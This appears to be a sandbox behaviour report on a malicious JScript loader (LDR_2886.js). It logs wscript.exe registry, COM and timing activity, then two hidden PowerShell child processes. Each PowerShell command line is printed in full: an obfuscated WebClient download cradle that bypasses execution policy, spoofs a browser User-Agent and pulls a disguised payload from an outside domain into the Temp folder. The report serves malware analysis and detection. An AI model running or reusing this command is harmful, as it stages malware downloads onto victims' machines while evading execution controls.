Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 16, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 1, type = REG_SZ	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 16, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 1, type = REG_SZ	1	Fn
Registry	Create Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 16, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 49, type = REG_NONE	1	Fn
System	Sleep	duration = -1 (infinite)	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\.js	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\.js, data = JSFile, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\JSFile\ScriptEngine	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\JSFile\ScriptEngine, data = JScript, type = REG_SZ	1	Fn
COM	Create	interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:45:55 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 123271	1	Fn
System	Get Time	type = Performance Ctr, time = 17675661926	1	Fn
Module	Load	module_name = ADVAPI32.dll, base_address = 0x7fefd710000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegisterTraceGuidsA, address_out = 0x7717f570	1	Fn
Module	Get Filename	process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 260	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegOpenKeyExA, address_out = 0x7fefd72b5f0	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features	1	Fn
System	Get Info	type = Operating System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\COM3	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegQueryValueExA, address_out = 0x7fefd72c480	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\COM3, value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegCloseKey, address_out = 0x7fefd730710	1	Fn
Module	Get Handle	module_name = c:\windows\system32\ole32.dll, base_address = 0x7fefea30000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoGetObjectContext, address_out = 0x7fefea4c920	1	Fn
Module	Load	module_name = ole32.dll, base_address = 0x7fefea30000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoCreateInstance, address_out = 0x7fefea57490	1	Fn
COM	Create	interface = 00000146-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER	1	Fn
Environment	Get Environment String	name = JS_PROFILER	1	Fn
COM	Create	interface = 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8, cls_context = CLSCTX_INPROC_SERVER	1	Fn
System	Get Time	type = Ticks, time = 123287	2	Fn
File	Create	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, type = size	1	Fn
Module	Create Mapping	module_name = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, protection = PAGE_READONLY, maximum_size = 19304	1	Fn
Module	Map	C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, process_name = c:\windows\system32\wscript.exe, desired_access = FILE_MAP_READ	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Unmap	process_name = c:\windows\system32\wscript.exe	1	Fn
System	Get Info	type = System Directory, result_out = ,õ$	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Module	Load	module_name = C:\Windows\system32\advapi32.dll, base_address = 0x7fefd710000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferIdentifyLevel, address_out = 0x7fefd72e470	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferComputeTokenFromLevel, address_out = 0x7fefd72f9b0	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferCloseLevel, address_out = 0x7fefd72f660	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:45:55 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 123599	1	Fn
System	Get Time	type = Performance Ctr, time = 17707547397	1	Fn
System	Get Info	type = Operating System	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, type = size	1	Fn
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, size = 19304, size_out = 19304	1	Fn Data
COM	Create	interface = E4D1C9B0-46E8-11D4-A2A6-00104BD35090, cls_context = CLSCTX_INPROC_SERVER	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:45:55 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 123615	1	Fn
System	Get Time	type = Performance Ctr, time = 17708583083	1	Fn
System	Get Info	type = Operating System	1	Fn
System	Get Info	type = Hardware Information	1	Fn
System	Get Time	type = Ticks, time = 124161	1	Fn
System	Get Time	type = Ticks, time = 124457	1	Fn
System	Get Time	type = Ticks, time = 124473	1	Fn
System	Get Time	type = Ticks, time = 124535	3	Fn
System	Get Time	type = Ticks, time = 124551	7	Fn
System	Get Time	type = Ticks, time = 124566	3	Fn
System	Get Time	type = Ticks, time = 124582	1	Fn
System	Get Time	type = Ticks, time = 124597	1	Fn
System	Get Info	type = Operating System	1	Fn
System	Get Time	type = Ticks, time = 124597	1	Fn
System	Get Time	type = Ticks, time = 124613	6	Fn
System	Get Time	type = Ticks, time = 124629	2	Fn
System	Get Time	type = Ticks, time = 124644	4	Fn
System	Get Time	type = Ticks, time = 124691	5	Fn
System	Get Time	type = Ticks, time = 124707	3	Fn
System	Get Time	type = Ticks, time = 124722	4	Fn
System	Get Time	type = Ticks, time = 124738	1	Fn
System	Get Time	type = Ticks, time = 124753	1	Fn
Module	Get Handle	module_name = c:\windows\system32\ole32.dll, base_address = 0x7fefea30000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CLSIDFromProgIDEx, address_out = 0x7fefea4a4c4	1	Fn
COM	Get Class ID	cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoGetClassObject, address_out = 0x7fefea62e18	1	Fn
COM	Create	interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:45:57 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 124753	1	Fn
System	Get Time	type = Performance Ctr, time = 17871817518	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Get Filename	process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261	1	Fn
Module	Get Handle	module_name = c:\windows\system32\wscript.exe, base_address = 0xff8d0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\wscript.exe, function = 1, address_out = 0xff8dd7f8	1	Fn
System	Get Time	type = Ticks, time = 124769	1	Fn
COM	Get Class ID	cls_id = 13709620-C279-11CE-A49E-444553540000, prog_id = shell.applicatiOn	1	Fn
COM	Create	interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
System	Get Time	type = Ticks, time = 124769	2	Fn
System	Get Time	type = Ticks, time = 124785	1	Fn
System	Sleep	duration = -1 (infinite)	1	Fn

Thread 0x8d4

1

0

»

Category	Operation	Information	Success	Count	Logfile
Window	Create	class_name = WSH-Timer, wndproc_parameter = 3234400		1	Fn

Process #7: powershell.exe

278

0

»

Information	Value
ID	#7
File Name	c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line	PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:00:51, Reason: Child Process
Unmonitor	End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration	00:03:34

OS Process Information

»

Information	Value
PID	0x8b8
Parent PID	0x848 (c:\windows\system32\cmd.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 8B4 0x 8D8 0x 8DC 0x 824 0x 9F4 0x 578 0x AD4

Threads

Thread 0x8b4

243

0

»

Category	Operation	Information	Count	Logfile
System	Get Info	type = Operating System	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
User	Lookup Privilege	privilege = SeDebugPrivilege, luid = 20	1	Fn
Module	Get Filename	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048	1	Fn
System	Get Info	type = SYSTEM_PROCESS_INFORMATION	1	Fn
Environment	Get Environment String	name = MshEnableTrace	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	15	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
System	Get Info	type = Operating System	1	Fn
Environment	Set Environment String	name = PSExecutionPolicyPreference, value = Bypass	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 4096	3	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 3315	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 781, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 0	1	Fn
System	Get Info	type = Hardware Information	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ	2	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	4	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 4096	5	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 2530	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 542, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 2762	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 310, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Registry	Read Value	value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	2	Fn
Environment	Get Environment String	name = MshEnableTrace	7	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = HOMEDRIVE, result_out = C:	1	Fn
Environment	Get Environment String	name = HOMEPATH, result_out = \Users\aETAdzjz	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	1	Fn
File	Get Info	filename = C:\, type = file_attributes	4	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	2	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	5	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	2	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
File	Get Info	filename = C:\, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	3	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Environment	Get Environment String	name = HomeDrive, result_out = C:	1	Fn
Environment	Get Environment String	name = HomePath, result_out = \Users\aETAdzjz	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	11	Fn

Thread 0x578

35

0

»

Category	Operation	Information	Success	Count	Logfile

Process #8: powershell.exe

333

0

»

Information	Value
ID	#8
File Name	c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line	PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:00:51, Reason: Child Process
Unmonitor	End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration	00:03:34

OS Process Information

»

Information	Value
PID	0x31c
Parent PID	0x83c (c:\windows\system32\cmd.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 8E8 0x 8E4 0x 8D0 0x 904 0x 948 0x 78C 0x 478

Threads

Thread 0x8e8

286

0

»

Category	Operation	Information	Count	Logfile
System	Get Info	type = Operating System	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
User	Lookup Privilege	privilege = SeDebugPrivilege, luid = 20	1	Fn
Module	Get Filename	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048	1	Fn
System	Get Info	type = SYSTEM_PROCESS_INFORMATION	1	Fn
Environment	Get Environment String	name = MshEnableTrace	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	14	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
System	Get Info	type = Operating System	1	Fn
Environment	Set Environment String	name = PSExecutionPolicyPreference, value = Bypass	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
